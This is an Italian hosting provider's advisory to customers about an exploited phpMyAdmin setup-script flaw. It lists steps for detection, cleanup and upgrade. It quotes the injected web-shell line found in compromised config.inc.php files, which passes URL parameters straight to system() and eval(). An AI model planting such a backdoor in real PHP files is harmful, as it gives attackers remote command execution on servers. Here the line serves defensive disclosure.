Buco di sicurezza in phpMyAdmin

Gentili Clienti,

nelle ultime ore stiamo riscontrando molti tentativi di exploit utilizzando un buco in phpMyAdmin. Nello specifico viene utilizzato un errore di verifica di una variabile in un file di configurazione auto-generato (percorso: config/config.inc.php) se si utilizza la routine di setup (percorso: scripts/setup.php) inclusa nel phpMyAdmin.

Consigliamo a tutti i Clienti che abbiano installato sul loro server dedicato oppure sul proprio spazio web phpMyAdmin di verificare e seguire i seguenti passi:

– effettuare una ricerca sul server e/o sullo spazio web del file “config.inc.php” e del file “setup.php”;
– se trovati, verificare se si tratta di files facenti parte di una installazione phpMyAdmin e che il percorso sia “config/config.inc.php” e “scripts/setup.php” (specialmente il file config.inc.php e’ soltanto pericolo se e’ stato generato in automatico dalla routine di setup; in questo caso normalmente si trova in config/config.inc.php) – non cancellate un file config.inc.php se non contiente la seguente stringa:

$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo 'pre';system($_GET['c']);echo 'pre';}if($_GET['p']){echo 'pre';eval($_GET['p']);echo 'pre';};//'] = 'localhost';

(infatti e’ proprio questa stringa – notare come la variabile $_GET[‘c’] non viene verificata prima di essere passata al commando “system”! – che causa il problema di sicurezza!)
;
– in caso affermativo cancellare (dopo aver effettuato un eventuale backup di sicurezza) il file setup.php e config.inc.php;
– verificare sul sistema se siano stati installati rootkits o se ci siano molti tentativi di indovinare password e/o escalazione di privilegi;
– installare le versioni piu’ recenti di phpMyAdmin (e’ tuttavia necessario cancellare il file config.inc.php della vecchia installazione anche effettuando un UPGRADE!) direttamente dal sito di phpMyAdmin.net; per comodita’ abbiamo provveduto a scaricare le due versioni piu’ recenti e le rendiamo disponibili ai seguenti link:

Versione 2.11.9.5 per server con PHP versione 4.x:
http://217.70.146.62/phpMyAdmin-2.11.9.5-all-languages.tar.bz2

Version 3.2.0 per server con PHP versione 5.x:
http://217.70.146.62/phpMyAdmin-3.2.0-all-languages.tar.bz2

L’exploit in questione permette di eseguire commandi e scripts PHP con i privilegi del webserver, normalmente “apache”. Di seguito e’ possibile che l’hacker tenti di indovinare passwords di altri accounts e/o di escalare i privilegi guadagnando la root, oltre che ai soliti utilizzi del server per inviare SPAM e/o infettare altri servers.

Ringraziamo per l’attenzione. Su tutti i servers managed, shared-hosting e da noi gestiti la configurazione e’ ed era sicura e/o abbiamo gia’ provveduto ad apportare gli aggiornamenti necessari.

Per ulteriori domande e chiarimenti rimaniamo a Vs completa disposizione.

Cordiali saluti,
il Vs team server24

Pubblicato in: